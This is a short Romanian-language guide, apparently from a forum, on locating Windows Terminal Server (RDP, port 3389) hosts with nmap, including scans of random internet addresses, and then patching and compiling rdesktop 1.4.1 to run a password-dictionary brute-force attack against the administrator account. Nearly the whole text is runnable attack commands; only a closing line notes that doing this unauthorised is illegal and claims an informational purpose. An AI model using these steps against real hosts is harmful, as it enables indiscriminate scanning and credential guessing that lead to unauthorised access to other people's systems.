Voi descrie o mica guida cum sa gasiti un service Terminal Server si sa efectuati un dictionary attack dintrun sistem Linux.Metode sunt mai multe ,aici voi descrie doar una .Voi folosi ca tool rdesktop 1.4.1 pt. Linux la care va trebui adaugata o patch pt a putea efectua dictionary attack.
Rdesktop 1.4.1 il pueti gasi pe internet dar aici va pun un link de unde il puteti lua avand si un file de patch incorporat
[Trebuie sa fiti inscris si conectat pentru a vedea acest link]Primul lucru care trebuie sa faceti e sa gasiti un terminal server , care de o default e pe portul TCP 3389
Puteti folosi urmatorul comand pt Nmap ,sau depinde ce scanner folositi voi .
nmap -oN TerminalServer.txt -p 3389 --open 192.168.0.0/24
unde in loc de 192.168.0.0/24 veti specifica ip-urile care vreti sa scannati .Nmap va salva totul intrun file TerminalServer.txt .
Un alt command e:
nmap -PS3389 -iR 0 -p 3389 --open -oN TerminalServer.txt
in loc de 0 puneti cate ip vreti ca sa scaneze.(de default 0 va scana la infinit) Si in acest caz Nmap salveaza totul in TerminalService.txt ,Optiunea - - open e ca sa arate doar open service.
Dupa ce aveti destule obiective veti trece la faza nr 2 Dictionary attack.
Descarcatii rdesktop-1.4.1.tar .
Va trebui sa scoateti din archiva cu comandul
tar -xf rdesktop-1.4.1.tar
Dupa care mergeti unde ati desfacut archiva ,
cd rdesktop-1.4.1
Si dati urmatorul comand pt patch
patch -p1 -i rdp-brute-force-r422.diff
Acum va trebui sa compilati :
./configure
make
make install
dupa ce ati terminat dati comandul rdesktop si va va arata toate optiunile.
Ex :
rdesktop -u administrator -p pass.txt 192.168.1.1
unde pass.txt este dictionar de cuvinte
Un administator va configura in asa fel incat unele vor permite doar cateva tentative si vor inchide restul .
Acest lucru este ilegal ,ar fi bine sa fiti autorizati inainte de a face un scan pe orice retea.
Totul poate fi salvat intrun file log.
Am scris aceasta guida cu scop informativ ,doar cunoscand ceea ce face inamicul se pot lua masuri.